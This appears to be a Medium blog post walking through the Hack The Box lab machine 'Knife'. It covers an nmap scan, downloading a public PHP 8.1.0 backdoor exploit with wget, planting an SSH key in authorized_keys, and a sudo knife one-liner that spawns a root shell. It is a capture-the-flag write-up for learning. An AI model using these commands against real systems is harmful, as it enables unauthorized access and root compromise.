Open in app

Sign in

Write

Sign in

HTB: Knife

Praddyum Verma
3 min readAug 29, 2021

--

Knife Badge

Machine IP: 10.129.139.25
System IP: 10.10.16.12

One of the easiest boxes for a beginner. Just don’t overthink and look for vulnerabilities for the things you see on surface.

Let’s start with network mapper (Nmap)

nmap -A -T4 -p- -v 10.129.139.27 -oN ./nmap.txt

which output the following

Nmap scan report for 10.129.139.27
Host is up (0.26s latency).
Not shown: 65431 closed ports, 102 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

On inspect I found that it’s running on `php 8.1.0` and with a simple google I landed on exploit.db link.

After we copied the python code to our system

wget https://www.exploit-db.com/raw/49933

then on running the exploit I provided the IP of target and boom we are inside system :)

Got the reverse shell

Inside `/home/james/user.txt` we got the user flag.

let’s check for sudo -l

Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

but our shell isn’t stable at all so :’) we are not able to navigate properly.

So lets try doing login via ssh but as we can’t use wget so we need to echo our public key to authorized key. Note: you have to first generate the key pairs link.

echo "ssh-rsa AAA......." > ~/.ssh/authorized_keys

and then ssh from our machine

ssh -i id_rsa james@10.10.10.242

On executing

sudo /usr/bin/knife

we find this

So we can execute a script

So we have to basically create a script and execute it as root :) what on earth we want. Just execute the shell as root.

Now let’s run it to get the root shell

sudo knife exec --exec "exec '/bin/sh -i' "
root flag

So what we doing here is to execute the line /bin/sh -i as a root user since we can execute it with sudo.

Thanks for reading and stay tuned for similar writeups.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Htb Writeup
Htb
Writeup
Boot2root
Hacking

--

--

Praddyum Verma
Praddyum Verma

Written by Praddyum Verma

40 Followers
2 Following

A very enthusiastic and learning behavior with a mentality of over-promising and over-delivering having experience working as freelance.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams